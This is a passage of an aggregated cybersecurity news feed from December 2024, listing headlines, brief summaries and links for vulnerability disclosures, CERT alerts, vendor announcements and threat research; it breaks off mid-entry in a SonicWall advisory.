//www.huawei.com/en/psirt/security-advisories/2024/huawei-sa-ptvihhms-91f7c6fa-en
From Remediation to Mitigation: Addressing Insecure-by-Design Flaws by Kat Traxler
2024-12-11T00:00:00Z | 1733875200

Forget the obscure, some of the sneakiest bugs hide in plain sight. This blog introduces a new vulnerability class in the cloud, Insecure-by-Design Flaws.

https://www.vectra.ai/blog/remediation-to-mitigation-addressing-insecure-by-design-flaws
2025 Predictions: GenAI Loses Steam as Defenders and Attackers See the Rise of Autonomous AI by Vectra AI
2024-12-11T00:00:00Z | 1733875200

As 2024 nears to a close, the AI hype seems to be approaching the inevitable disillusionment stage. The initial excitement surrounding AI’s potential

https://www.vectra.ai/blog/2025-predictions-genai-loses-steam-as-defenders-and-attackers-see-the-rise-of-autonomous-ai
Cleo MFT Mass Exploitation Payload Analysis
2024-12-10T22:20:10Z | 1733869210

Written by ARC Labs contributors, John Dwyer and Eric Gonzalez ARC Labs recently capture and analyzed the second and third stage payloads used during a Cleo MFT compromise. The compromise is a result of exploitation of CVE-2024-50623 which allows for unauthorized remote code execution. Additional reports suggest that exploitation of the vulnerability continues to be possible even after […] The post Cleo MFT Mass Exploitation Payload Analysis appeared first on Binary Defense.

https://www.binarydefense.com/resources/blog/cleo-mft-mass-exploitation-payload-analysis/
Unauthorized Plugin Installation/Activation in Hunk Companion
2024-12-10T21:03:51Z | 1733864631

This report highlights a vulnerability in the Hunk Companion plugin < 1.9.0 that allows unauthenticated POST requests to install and activate plugins directly from the WordPress.org repository. This flaw poses a significant security risk, as it enables attackers to install vulnerable or closed plugins, which can then be exploited for attacks such as Remote Code Execution […]

https://wpscan.com/blog/unauthorized-plugin-installation-activation-in-hunk-companion/
Patchetirsdag desember 2024
2024-12-10T19:42:25Z | 1733859745

Microsoft har offentliggjort de månedlige sikkerhetsoppdateringene sine. Det er 17 sårbarheter vurdert som kritiske av Microsoft.

https://nsm.no/fagomrader/digital-sikkerhet/nasjonalt-cybersikkerhetssenter/varsler-fra-ncsc/patchetirsdag-desember-2024
Bot Reporting: 4 Key Differences to Consider
2024-12-10T17:00:00Z | 1733850000

Get a detailed look at Akamai?s bot reporting and the important advantages it offers to organizations that are looking to improve their bot defenses.

https://www.akamai.com/blog/security/2024/dec/bot-reporting-4-key-differences-to-consider
Sophos AI to present on how to defang malicious AI models at Black Hat Europe
2024-12-10T15:35:16Z | 1733844916

“LLMbotomy” research reveals how Trojans can be injected into Large Language Models, and how to disarm them.

https://news.sophos.com/en-us/2024/12/10/sophos-ai-to-present-on-how-to-defang-malicious-ai-models-at-black-hat-europe/
Cato Networks Expands Platform to Deliver the Industry’s First SASE-native IoT/OT Security Solution
2024-12-10T13:00:00Z | 1733835600

Today, Cato Networks introduced Cato IoT/OT Security, the industry’s first SASE-native IoT/OT security solution. Cato IoT/OT Security extends SASE-based protection into IoT/OT environments, improving visibility and security while reducing complexity.   Cato IoT/OT Security is a native feature in the Cato SASE Cloud Platform. It allows enterprises to instantly activate the new solution with a click... The post Cato Networks Expands Platform to Deliver the Industry’s First SASE-native IoT/OT Security Solution   appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-expands-platform-to-deliver-first-sase-native-iot-ot-security-solution/
What You Should Know About BreakingWAF
2024-12-10T12:15:00Z | 1733832900

BreakingWAF is not a vulnerability stemming from WAF solutions ? it is a misconfiguration vulnerability that can be addressed during customer onboarding.

https://www.akamai.com/blog/security-research/2024/dec/what-you-should-know-about-breakingwaf
TransUnion Partners with Aryza to Enhance Credit and Debt Management Solutions in the UK and Ireland
2024-12-10T11:59:55Z | 1733831995

Global information and insights company TransUnion has announced a partnership with Aryza Group, a leading provider of financial software solutions.The partnership will leverage the strengths of both companies to offer comprehensive credit and debt management solutions across all Aryza platforms and services in the UK and Ireland, whilst keeping consumer well-being at the heart of decision making.The collaboration is designed to address the growing demand for integrated credit and debt management solutions among TransUnion’s customer bases. The partnership aims to fill the gaps identified by TransUnion for clients that are looking for more comprehensive platform and data solutions across the credit and debt management cycle. This initiative will seamlessly align Aryza’s product offerings to TransUnion’s client engagements, ensuring that all opportunities are fully supported and optimised by introducing TransUnion’s clients to Aryza’s suite of platforms and solutions as potential end-users.Sam Welch, chief revenue officer at TransUnion in the UK, said: “We are delighted to partner with Aryza to bring advanced solutions to our clients in the UK and Ireland. Aryza’s innovative platforms, combined with our extensive data insights, will enable us to deliver more effective services. This collaboration showcases how companies can innovate together using the latest technology, reflecting our commitment to information for good by evolving with our clients’ needs and delivering enhanced value through collaboration.”Kevin O’Neill, chief revenue officer at Aryza, added: "This partnership marks a major milestone for Aryza. Collaborating with a highly respected organisation like TransUnion, that knows and trusts Aryza from our successful data partnerships in the UK and Ireland, underscores the strength of our solutions and our unwavering commitment to innovation in the sector. Partnering with TransUnion will allow us to expand our reach and provide our solutions to a broader audience, helping more individuals and businesses manage their credit and debt obligations effectively."

https://newsroom.transunion.co.uk/transunion-partners-with-aryza-to-enhance-credit-and-debt-management-solutions-in-the-uk-and-ireland/
How cyber-secure is your business? | Unlocked 403 cybersecurity podcast (ep. 8)
2024-12-10T11:23:25Z | 1733829805

As cybersecurity is a make-or-break proposition for businesses of all sizes, can your organization's security strategy keep pace with today’s rapidly evolving threats?

https://www.welivesecurity.com/en/videos/cyber-secure-business-unlocked-403-cybersecurity-podcast-ep-8/
Breaking the Circle: Chinese Communist Party Propaganda Infrastructure Rapidly Expands
2024-12-10T00:00:00Z | 1733788800

China's ICCs reshape global propaganda via targeted messaging, social media, and influence networks to amplify the Communist Party's voice globally.

https://www.recordedfuture.com/research/breaking-the-circle-chinese-communist-party-propaganda
Operational Disruption, Legal Risk, and Churn From Lost Consumer Trust Drive The Business Impact of Data Breaches
2024-12-10T00:00:00Z | 1733788800

Discover the rising costs of data breaches, including disruption, legal risks, and lost trust. Learn proactive steps to protect your business from escalating threats.

https://www.recordedfuture.com/blog/business-impact-data-breaches
From PoC to Attacker Interest in Hours: Real-Time Insights into Mitel MiCollab Vulnerabilities
2024-12-10T00:00:00Z | 1733788800

Attackers exploit vulnerabilities within hours of PoC releases. Learn how GreyNoise provides real-time intelligence to detect and disrupt threats, helping defenders respond faster and stay ahead of evolving risks.

https://www.greynoise.io/blog/from-poc-to-attacker-interest-in-hours-real-time-insights-into-mitel-micollab-vulnerabilities
Lessons from the Field: How a Manufacturing Giant Transformed Its Security Posture
2024-12-09T15:05:51Z | 1733756751

The complexities of cybersecurity often seem insurmountable for large enterprises. For one global manufacturing company, this was a lived reality. With a workforce of over 60,000 employees, more than 450,000 clients, and a steady stream of mergers and acquisitions, their security team faced challenges that felt increasingly impossible to solve. Yet, their journey toward building […] The post Lessons from the Field: How a Manufacturing Giant Transformed Its Security Posture  appeared first on Binary Defense.

https://www.binarydefense.com/resources/blog/lessons-from-the-field-how-a-manufacturing-giant-transformed-its-security-posture/
35 more Semgrep rules: infrastructure, supply chain, and Ruby
2024-12-09T14:00:43Z | 1733752843

We are publishing another set of custom Semgrep rules, bringing our total number of public rules to 115. This blog post will briefly cover the new rules, then explore two Semgrep features in depth: regex mode (especially how it compares against generic mode), and HCL language support for technologies […]

https://blog.trailofbits.com/2024/12/09/35-more-semgrep-rules-infrastructure-supply-chain-and-ruby/
Eesti.ee mobiilirakendus toob riigiteenused otse taskusse
2024-12-09T13:05:08Z | 1733749508

Riigi Infosüsteemi Amet (RIA) ja Justiitsministeerium tutvustasid täna uut Eesti.ee mobiilirakendust. Uus Eesti äpp aitab kõigil mugavalt ja turvaliselt suhelda riigiga – kasutada riiklikke teenuseid, vaadata oma andmeid ja tulevikus kasutada ka erasektori teenuseid. Äpi saab tasuta alla laadida Google Play ja Apple Store'i poodidest.

https://ria.ee/uudised/eestiee-mobiilirakendus-toob-riigiteenused-otse-taskusse
The Economic Impact of Akamai Guardicore Segmentation
2024-12-09T13:00:00Z | 1733749200

https://www.akamai.com/blog/security/2024/nov/the-economic-impact-of-akamai-guardicore-segmentation
Harmonizing risk and consequence strategies across IT and OT environments for greater cyber resilience
2024-12-09T11:40:16Z | 1733744416

The post Harmonizing risk and consequence strategies across IT and OT environments for greater cyber resilience appeared first on Radiflow.

https://industrialcyber.co/features/harmonizing-risk-and-consequence-strategies-across-it-and-ot-environments-for-greater-cyber-resilience/
S-RM shares five key steps to prepare for DORA
2024-12-09T10:13:54Z | 1733739234

S-RM shares five key steps to prepare for DORA Conducting a gap analysis to identify weaknesses is crucial for meeting DORA’s security requirements Preparation will also require management education, improved incident readiness and reporting, and likely updated contracts to meet obligations London, 9 December 2024 – Leading global cyber security and investigations consultancy S-RM has identified five critical steps for financial institutions and their ICT providers to achieve compliance with the Digital Operational Resilience Act (DORA), which will enter force from 17 January 2025. DORA establishes an EU-wide oversight framework designed to ensure the financial sector can withstand severe operational disruptions. Covering over 20,000 entities, including financial institutions, crypto-asset service providers, credit rating agencies, and ICT service providers, the regulation introduces strict requirements for cyber risk management, incident reporting, resilience testing and third-party risk monitoring. To help organisations prepare for DORA, S-RM recommends the following steps: Conduct a gap analysis to identify weaknesses against DORA’s requirements and establish a targeted plan to address them Educate management on their responsibilities under DORA and adopt a top-down approach to cyber security Test incident preparedness and recovery with key business and IT stakeholders Ensure readiness to classify and report security incidents to relevant authorities within 24 hours Update contractual relationships with relevant ICT third parties to include obligations around information security and risk management as well as rights for inspection, access to information and secure exit strategies DORA marks a significant step in aligning cyber security requirements applied to critical national infrastructures across the EU and strengthening operational resilience of the financial sector and critical ICT providers that support it. It represents both a challenge and an opportunity for the organisations that will be brought within its scope, including those companies headquartered in the UK with service offerings in the EU. By following these steps, organisations can strongly position themselves to detect cyber threats, limit the impact of cyber incidents and prepare for the requirements that DORA imposes on them.   Katherine Kearns, Head of Proactive Cyber Services at S-RM, comments: While DORA may seem complex, it essentially aggregates and prioritises many of the cyber security practices that financial entities in Europe have already been working towards. By focusing on the actionable steps outlined, organisations can not only meet compliance requirements but also strengthen their overall resilience to cyber threats. At S-RM, we remain committed to helping organisations navigate regulatory hurdles like DORA and build robust cyber resilience across their business.” About S-RM S-RM is a global intelligence and cyber security consultancy with expertise in insurance, cyber security and cyber response. Headquartered in London, S-RM works across nine international offices and advises companies ranging from blue-chip corporates to large financial institutions, and beyond.     To find out more about S-RM, visit www.s-rminform.com    For further information, please contact: Nick Andrews Rostrum   n.andrews@rostrum.agency s-rm@rostrum.agency  07715267232

https://www.s-rminform.com/news/s-rm-shares-five-key-steps-to-prepare-for-dora
Are pre-owned smartphones safe? How to choose a second-hand phone and avoid security risks
2024-12-09T10:00:00Z | 1733738400

Buying a pre-owned phone doesn’t have to mean compromising your security – take these steps to enjoy the benefits of cutting-edge technology at a fraction of the cost

https://www.welivesecurity.com/en/mobile-security/are-preowned-smartphones-safe-how-choose-second-hand-phone-avoid-security-risks/
Crawling December: HTTP caching
2024-12-09T10:00:00Z | 1733738400

Allow us to cache, pretty please. As the internet grew over the years, so did how much Google crawls. While Google's crawling infrastructure supports heuristic caching mechanisms, in fact always had, the number of requests that can be returned from local caches has decreased: 10 years ago about 0.026% of the total fetches were cacheable, which is already not that impressive; today that number is 0.017%.

https://developers.google.com/search/blog/2024/12/crawling-december-caching
Security Alert (A24-12-06): Multiple Vulnerabilities in QNAP Products
2024-12-09T04:00:00Z | 1733716800

QNAP has published security advisories to address multiple vulnerabilities in QNAP products.

https://www.govcert.gov.hk/en/alerts_detail.php
Build a Proactive Security Program with Vectra MXDR’s Latest Capabilities by Gary Ruiz
2024-12-09T00:00:00Z | 1733702400

Discover the latest Vectra MXDR capabilities, including enhanced response for 3rd-party integrations, brand reputation monitoring, and threat hunting.

https://www.vectra.ai/blog/build-a-proactive-security-program-with-vectra-mxdrs-latest-capabilities
From Tactical Moves to Transformation: The Ripple Effect of SASE
2024-12-08T08:31:08Z | 1733646668

Wikipedia defines a ripple effect as “an initial disturbance to a system propagating outward to disturb an increasingly larger portion of the system.” This phenomenon is highly applicable to many IT transformations such as cloud migration and move to hybrid work, but even more so to SASE (Secure Access Service Edge). Enterprises often embark on... The post From Tactical Moves to Transformation: The Ripple Effect of SASE appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-ripple-effect-of-sase/
Цільові кібератаки UAC-0185 у відношенні Сил оборони та підприємств ОПК України (CERT-UA#12414)
2024-12-07T10:49:19Z | 1733568559

Урядовою командою реагування на комп'ютерні надзвичайні події України CERT-UA отримано інформацію щодо розповсюдження 04.12.2024 електронних листів з темою "до уваги_змiни_02-1-437 вiд 04.12.2024р.", нібито, від імені Українського союзу промисловців та підприємців (УСПП) із запрошенням на конференцію, присвячену тематиці переходу продукції ОПК України на технічні стандарти НАТО, що проводилася в м.Києві 05.12.2024 у змішаному форматі.

https://cert.gov.ua/article/6281632
Akamai IP Accelerator: A Holistic Approach to Security and Performance
2024-12-06T13:00:00Z | 1733490000

https://www.akamai.com/blog/security/2024/dec/a-holistic-approach-to-security-and-performance
Vulnerabilities in Tungsten Automation TotalAgility software
2024-12-06T11:00:00Z | 1733482800

CERT Polska has received a report about 2 XSS (Cross-site Scripting) vulnerabilities (CVE-2024-7874 and CVE-2024-7875) found in Tungsten Automation (formerly Kofax) TotalAgility software.

https://cert.pl/en/posts/2024/12/CVE-2024-7874/
Hillstone I-Series Breach Detection System (BDS)
2024-12-06T09:06:44Z | 1733476004

The Hillstone Network detection and response (NDR) product Breach Detection System (BDS) adopts multiple threat detection technologies that include traditional signature-based or rule-based technology and large-scale threat intelligence data modeling, as well as machine learning-based user behavior analysis. The system provides an ideal solution for detecting advanced threats, including ransomware and crypto-mining malware, and protecting […] The post Hillstone I-Series Breach Detection System (BDS) appeared first on Hillstone Networks.

https://www.hillstonenet.com/more/resources/hillstone-i-series-breach-detection-system-bds/
Security Alert (A24-12-04): Multiple Vulnerabilities in Microsoft Edge
2024-12-06T04:00:00Z | 1733457600

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-12-05): Multiple Vulnerabilities in SonicWall SMA 100 Series Products
2024-12-06T04:00:00Z | 1733457600

SonicWall released a security advisory to address multiple vulnerabilities in SMA 100 series products.

https://www.govcert.gov.hk/en/alerts_detail.php
Compromising OpenWrt Supply Chain via Truncated SHA-256 Collision and Command Injection
2024-12-06T00:00:00Z | 1733443200

Introduction Hello, I’m RyotaK (@ryotkak ), a security engineer at Flatt Security Inc. A few days ago, I was upgrading my home lab network, and I decided to upgrade the OpenWrt on my router.1 After accessing the LuCI, which is the web interface of OpenWrt, I noticed that there is a section called Attended Sysupgrade, so I tried to upgrade the firmware using it. After reading the description, I found that it states it builds new firmware using an online service.

https://flatt.tech/research/posts/compromising-openwrt-supply-chain-sha256-collision/
CVE-2024-52558
2024-12-05T16:08:00Z | 1733414880

CWE-191 INTEGER UNDERFLOW (WRAP OR WRAPAROUND): The affected product is vulnerable to an integer underflow. An unauthenticated attacker could send a malformed HTTP Requesty, which could allow the attacker to crash the program. Planet Technology recommends users upgrade to version 1.305b241111 or later.

https://claroty.com/team82/disclosure-dashboard/cve-2024-52558
CVE-2024-52320
2024-12-05T16:07:00Z | 1733414820

CWE-78 IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN AN OS COMMAND ('OS COMMAND INJECTION'): The affected product is vulnerable to a command injection. An unauthenticated attacker could send commands through a malicious HTTP request which could result in remote code execution. Planet Technology recommends users upgrade to version 1.305b241111 or later.

https://claroty.com/team82/disclosure-dashboard/cve-2024-52320
CVE-2024-48871
2024-12-05T16:05:00Z | 1733414700

CWE-121 STACK-BASED BUFFER OVERFLOW: The affected product is vulnerable to a stack-based buffer overflow. An unauthenticated attacker could send a malicious HTTP request that the webserver fails to properly check input size before copying data to the stack, potentially allowing remote code execution. Planet Technology recommends users upgrade to version 1.305b241111 or later.

https://claroty.com/team82/disclosure-dashboard/cve-2024-48871
Why Zero-Day Attacks Bypass Traditional Firewall Security: Defending Against Zero-Day’s like Palo Alto Networks CVE-2024-0012
2024-12-05T15:30:00Z | 1733412600

Recently, Palo Alto Networks identified and patched a critical zero-day vulnerability in their next-generation firewalls (NGFWs). This vulnerability, tracked as CVE-2024-0012, allowed attackers to execute code on vulnerable devices remotely. This vulnerability has been actively exploited in attacks dubbed "Operation Lunar Peek."

https://mixmode.ai/blog/why-zero-day-attacks-bypass-traditional-firewall-security-defending-against-zero-days-like-palo-alto-networks-cve-2024-0012/
Executive summary and updated joint guidance on choosing secure and verifiable technologies
2024-12-05T13:38:07Z | 1733405887

https://cyber.gc.ca/en/news-events/executive-summary-and-updated-joint-guidance-choosing-secure-and-verifiable-technologies
Red Flag Bulletin | December 2024 | Indian billionaire Gautam Adani indicted in US bribery case
2024-12-05T13:35:58Z | 1733405758

This month’s top stories: US federal prosecutors indict Indian billionaire Gautam Adani for alleged involvement in USD 265 million bribery and fraud scheme;  European Public Prosecutors’ Office uncovers criminal syndicate based in the Baltics and makes arrests in Estonia, Latvia, Lithuania, and Italy in connection with an investigation into a VAT fraud scheme that has caused loss of EUR 297 million; and  UAE Central Bank suspends currency exchange for anti-money laundering and counter-terrorist violations after strengthening financial crime legislation.

https://www.s-rminform.com/red-flag-bulletin/december-2024
How Holiday Season Traditions Affect Internet Traffic Trends
2024-12-05T13:00:00Z | 1733403600

https://www.akamai.com/blog/edge/2024/dec/how-holiday-season-traditions-affect-internet-traffic-trends
Trust but Verify: Strengthening AI Security with Data Protection
2024-12-05T12:08:57Z | 1733400537

Research reveals an alarming vulnerability in AI systems, and their susceptibility to jailbreaking, highlighting the need to secure the data that underpins AI. The post Trust but Verify: Strengthening AI Security with Data Protection appeared first on Certes.

https://certes.ai/2024/12/05/strengthening-ai-security-data-protection/
CERT Polska expectations from Meta regarding the problem of fraud on its social media platforms
2024-12-05T11:30:00Z | 1733398200

The material on social media fraud is visible now in Meta's services, but CERT Polska's position remains unchanged. We need solutions that will increase the security of Polish users.

https://cert.pl/en/posts/2024/12/expectations-from-meta/
Philip Torr: AI to the people | Starmus highlights
2024-12-05T10:00:00Z | 1733392800

We’re on the cusp of a technological revolution that is poised to transform our lives – and we hold the power to shape its impact

https://www.welivesecurity.com/en/videos/philip-torr-ai-people-starmus-highlights/
November küberruumis: mitu Eesti ettevõtet langes arvepettuse ohvriks
2024-12-05T09:32:08Z | 1733391128

Riigi Infosüsteemi Ameti (RIA) kuuülevaatest selgub, et neli ettevõtet kaotas novembris arvepettuste tagajärjel kokku ligi 300 000 eurot ning üht hambaravikliinikut tabas lunavararünnak.

https://ria.ee/uudised/november-kuberruumis-mitu-eesti-ettevotet-langes-arvepettuse-ohvriks
Security alert CVE-2024-41730: Stormshield Products Response
2024-12-05T08:44:18Z | 1733388258

A new critical authentication bypass vulnerability impacting SAP BusinessObjects Business Intelligence Platform from SAP has been reported. It has been assigned the reference CVE-2024-41730 and a CVSS 3.1 score of 9.8. This flaw impacts the following version of the application: Enterprise 420 ; Enterprise 430 ; Enterprise... The post Security alert CVE-2024-41730: Stormshield Products Response appeared first on Stormshield.

https://www.stormshield.com/news/security-alert-cve-2024-41730-stormshield-products-response/
Security alert CVE-2024-41730: Stormshield Products Response
2024-12-05T08:44:18Z | 1733388258

A new critical authentication bypass vulnerability impacting SAP BusinessObjects Business Intelligence Platform from SAP has been reported. It has been assigned the reference CVE-2024-41730 and a CVSS 3.1 score of 9.8. This flaw impacts the following version of the application: Enterprise 420 ; Enterprise 430 ; Enterprise... The post Security alert CVE-2024-41730: Stormshield Products Response appeared first on Stormshield.

https://www.stormshield.com/news/security-alert-cve-2024-41730-stormshield-products-response/
How SASE Helps Address IT Burnout and Reduce Operational Risks
2024-12-05T07:23:44Z | 1733383424

In today’s fast-paced business environment, IT teams are under increasing pressure to keep networks running smoothly and securely. The burden of managing a growing number of endpoints, networks, and cloud services—combined with constant threats of cyberattacks—can lead to IT burnout. Burnout affects the well-being of IT professionals and increases the likelihood of human error, such... The post How SASE Helps Address IT Burnout and Reduce Operational Risks  appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-sase-helps-address-it-burnout-and-reduce-operational-risks/
FIRST Drives Global Cybersecurity Progress Through Community-Led Innovation
2024-12-05T05:00:00Z | 1733374800

White House recognizes FIRST's Traffic Light Protocol (TLP) as cybersecurity best practice; Record attendance at FIRSTCON Fukuoka marks Asia-Pacific expansion; Historic FIRST & AfricaCERT Symposium strengthens African cybersecurity collaboration

https://www.first.org/newsroom/releases/20241205
FIRST Drives Global Cybersecurity Progress Through Community-Led Innovation
2024-12-05T05:00:00Z | 1733374800

White House recognizes FIRST's Traffic Light Protocol (TLP) as cybersecurity best practice; Record attendance at FIRSTCON Fukuoka marks Asia-Pacific expansion; Historic FIRST & AfricaCERT Symposium strengthens African cybersecurity collaboration

https://www.first.org/newsroom/releases/20241205
BlueAlpha Abuses Cloudflare Tunneling Service for GammaDrop Staging Infrastructure
2024-12-05T00:00:00Z | 1733356800

BlueAlpha, a Russian cyber group, uses Cloudflare Tunnels to deploy GammaDrop malware, escalating challenges in targeting Ukrainian entities.

https://www.recordedfuture.com/research/bluealpha-abuses-cloudflare-tunneling-service
UK girls triumph in national cyber skills contest
2024-12-04T16:56:09Z | 1733331369

Teams of girls from schools across the UK have been crowned cyber security champions

https://www.ncsc.gov.uk/news/uk-girls-triumph-in-national-cyber-skills-contest
iSource 2.0R12: Unlocking New Capabilities for IT Management
2024-12-04T16:04:06Z | 1733328246

Managing assets and workflows efficiently is a constant challenge, especially for larger organizations with complex IT infrastructures. That’s why we’re excited to announce the release of iSource 2.0R12, packed with powerful new features designed to streamline asset identification, improve ticketing processes, and enhance role-based access controls. Let’s dive into what’s new and how these features […] The post iSource 2.0R12: Unlocking New Capabilities for IT Management appeared first on Hillstone Networks.

https://www.hillstonenet.com/blog/isource-2-0r12-unlocking-new-capabilities-for-it-management/
Bypassing WAFs with the phantom $Version cookie
2024-12-04T15:03:35Z | 1733324615

HTTP cookies often control critical website features, but their long and convoluted history exposes them to parser discrepancy vulnerabilities. In this post, I'll explore some dangerous, lesser-known

https://portswigger.net/research/bypassing-wafs-with-the-phantom-version-cookie
Resilient by Design: Akamai?s Data-Driven Path to Climate Adaptation
2024-12-04T14:00:00Z | 1733320800

Learn how Akamai is using the challenges of climate change as opportunities for innovation and progress to weave climate resilience into our long-term strategy.

https://www.akamai.com/blog/sustainability/2024/nov/resilient-by-design-akamais-data-driven-path-to-climate-adaptation
CVE-2024-52324
2024-12-04T12:00:00Z | 1733313600

CWE-242 Use of Inherently Dangerous Function: Ruijie Reyee OS versions prior to 2.260.0.1329 uses an inherently dangerous function which could allow an attacker to send a malicious MQTT message which could result in devices executing arbitrary OS commands. Ruijie reports that the issues have been fixed on the cloud and no action is needed by end users.

https://claroty.com/team82/disclosure-dashboard/cve-2024-52324
CVE-2024-51727
2024-12-04T12:00:00Z | 1733313600

CWE-826 Premature Release of Resource During Expected Lifetime: Ruijie Reyee OS versions prior to 2.260.0.1329 contains a a feature that could enable attackers to invalidate a legitimate users session and cause a denial-of-service attack on a user's account. Ruijie reports that the issues have been fixed on the cloud and no action is needed by end users.

https://claroty.com/team82/disclosure-dashboard/cve-2024-51727
CVE-2024-48874
2024-12-04T12:00:00Z | 1733313600

CWE-918 Server-Side Request Forgery (SSRF): Ruijie Reyee OS versions prior to 2.260.0.1329 could give attackers the ability to force Ruijie's proxy servers to perform any request the attackers choose. Using this, attackers could access internal services used by Ruijie and their internal cloud infrastructure via AWS cloud metadata services. Ruijie reports that the issues have been fixed on the cloud and no action is needed by end users.

https://claroty.com/team82/disclosure-dashboard/cve-2024-48874
CVE-2024-47791
2024-12-04T12:00:00Z | 1733313600

CWE-155 Improper Neutralization of Wildcards or Matching Symbols: Ruijie Reyee OS versions prior to 2.260.0.1329 could allow an attacker to subscribe to all possible topics in Ruijie MQTT broker, and receive all messages being sent to and from devices. Ruijie reports that the issues have been fixed on the cloud and no action is needed by end users.

https://claroty.com/team82/disclosure-dashboard/cve-2024-47791
CVE-2024-47547
2024-12-04T12:00:00Z | 1733313600

CWE-640 Weak Password Recovery Mechanism for Forgotten Password Ruijie Reyee OS versions prior to 2.260.0.1329 contains a weak mechanism for its users to change their passwords which leaves authentication vulnerable to brute force attacks. Ruijie reports that the issues have been fixed on the cloud and no action is needed by end users.

https://claroty.com/team82/disclosure-dashboard/cve-2024-47547
CVE-2024-47146
2024-12-04T12:00:00Z | 1733313600

CWE-688 Exposure of Resource to Wrong Sphere: Ruijie Reyee OS versions prior to 2.260.0.1329 uses a value as a "secret" within the in the platform that can be attained being physically adjacent and sniffing the RAW WIFI signal. Ruijie reports that the issues have been fixed on the cloud and no action is needed by end users.

https://claroty.com/team82/disclosure-dashboard/cve-2024-47146
CVE-2024-47043
2024-12-04T12:00:00Z | 1733313600

CWE-922 Insecure Storage of Sensitive Information: Ruijie Reyee OS versions prior to 2.260.0.1329 could enable an attacker to correlate a device serial number and the owner's phone number and part of the email address. Ruijie reports that the issues have been fixed on the cloud and no action is needed by end users.

https://claroty.com/team82/disclosure-dashboard/cve-2024-47043
CVE-2024-46874
2024-12-04T12:00:00Z | 1733313600

CWE-280 Improper Handling of Insufficient Permissions or Privileges: Ruijie Reyee OS versions prior to 2.260.0.1329 could allow MQTT clients connecting with device credentials to send messages to some topics. Attackers with device credentials could issue commands to other devices on behalf of Ruijie's cloud. Ruijie reports that the issues have been fixed on the cloud and no action is needed by end users.

https://claroty.com/team82/disclosure-dashboard/cve-2024-46874
CVE-2024-45722
2024-12-04T12:00:00Z | 1733313600

CWE-1391 Use of Weak Credentials: Ruijie Reyee OS versions prior to 2.260.0.1329 uses weak credential mechanism that could allow an attacker to easily calculate MQTT credentials. Ruijie reports that the issues have been fixed on the cloud and no action is needed by end users.

https://claroty.com/team82/disclosure-dashboard/cve-2024-45722
CVE-2024-42494
2024-12-04T12:00:00Z | 1733313600

CWE-359 Exposure of Private Personal Information to an Unauthorized Actor: Ruijie Reyee OS versions prior to 2.260.0.1329 contains a a feature that could enable sub accounts or attackers attackers to view and exfiltrate sensitive information from all cloud accounts registered to Ruijie's services.

https://claroty.com/team82/disclosure-dashboard/cve-2024-42494
Stay safe on social media – tips for using social media securely
2024-12-04T11:19:57Z | 1733311197

Have you ever wondered what information people can find out about you from social media or what would happen if someone got their hands on your social media accounts? Social media has become a big part of our everyday lives, making it easy to communicate with others and share bits of our life with pictures and posts. It is important to remember that there are also bad actors on social media who are up to no good. This article focuses on using social media safely and securely and explains the inherent risks of social media.

https://www.kyberturvallisuuskeskus.fi/en/news/stay-safe-social-media-tips-using-social-media-securely
Stay safe on social media – tips for using social media securely
2024-12-04T11:19:57Z | 1733311197

Have you ever wondered what information people can find out about you from social media or what would happen if someone got their hands on your social media accounts? Social media has become a big part of our everyday lives, making it easy to communicate with others and share bits of our life with pictures and posts. It is important to remember that there are also bad actors on social media who are up to no good. This article focuses on using social media safely and securely and explains the inherent risks of social media.

https://www.kyberturvallisuuskeskus.fi/en/news/stay-safe-social-media-tips-using-social-media-securely
Vulnerability in Infinix Mobile devices
2024-12-04T11:00:00Z | 1733310000

Improper Verification of Intent by Broadcast Receiver vulnerability (CVE-2024-10576) allowing unauthorized factory reset has been found in Infinix Mobile preloaded application com.transsion.agingfunction.

https://cert.pl/en/posts/2024/12/CVE-2024-10576/
Security Alert (A24-12-03): Vulnerability in Google Chrome
2024-12-04T04:00:00Z | 1733284800

Google released a security update to address a vulnerability in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
CISA Reveals the Need for Continuous Offensive Security Testing by Lucie Cardiet
2024-12-04T00:00:00Z | 1733270400

Discover why traditional defenses fall short and how continuous offensive security testing can help your organization detect and respond to cyber attacks.

https://www.vectra.ai/blog/cisa-reveals-the-need-for-continuous-offensive-security-testing
SonicWall SMA100 SSL-VPN Affected By Multiple Vulnerabilities
2024-12-03T20:31:54Z | 1733257914

1) Path traversal vulnerability – attributed to publicly known Apache HTTP Server vulnerability (CVE-2024-38475)Improper escaping of output in mod_rewrite in Apache HTTP Server 2.4.59 and earlier allows an attacker to map URLs to file system locations that are permitted to be served by the server. CVSS Score: 9.8  CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CWE-35: Path traversal vulnerability 2) CVE-2024-40763 - SonicWALL SMA100 Heap-based buffer overflow vulnerabilityHeap-based buffer overflow vulnerability in the SonicWall SMA100 SSLVPN due to the use of strcpy. This allows remote authenticated attackers to cause Heap-based buffer overflow and potentially lead to code execution. CVSS Score: 7.5 CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H CWE-122: Heap-based Buffer Overflow 3) CVE-2024-45318 - Stack-based buffer overflow vulnerabilityA vulnerability in the SonicWall SMA100 SSLVPN web management interface allows remote attackers to cause Stack-based buffer overflow and potentially lead to code execution.CVSS Score: 8.1 CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H CWE-121: Stack-based Buffer Overflow 4) CVE-2024-45319 - Certificate-based authentication bypassA vulnerability in the SonicWall SMA100 SSLVPN allows a remote authenticated attacker can circumvent the certificate requirement during authentication. CVSS Score: 6.3 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L CWE-798: Use of Hard-coded Credentials 5) CVE-2024-53702 - Insecure randomnessUse of Cryptographically Weak Pseudo-Random Number Generator (PRNG) in the SonicWall SMA100 SSLVPN backup code generator that, in certain cases, can be predicted by an attacker, potentially exposing the generated secret.CVSS Score: 5.3 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N CWE-338: Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) 6) CVE-2024-53703 - Stack-based buffer overflow vulnerabilityA vulnerability 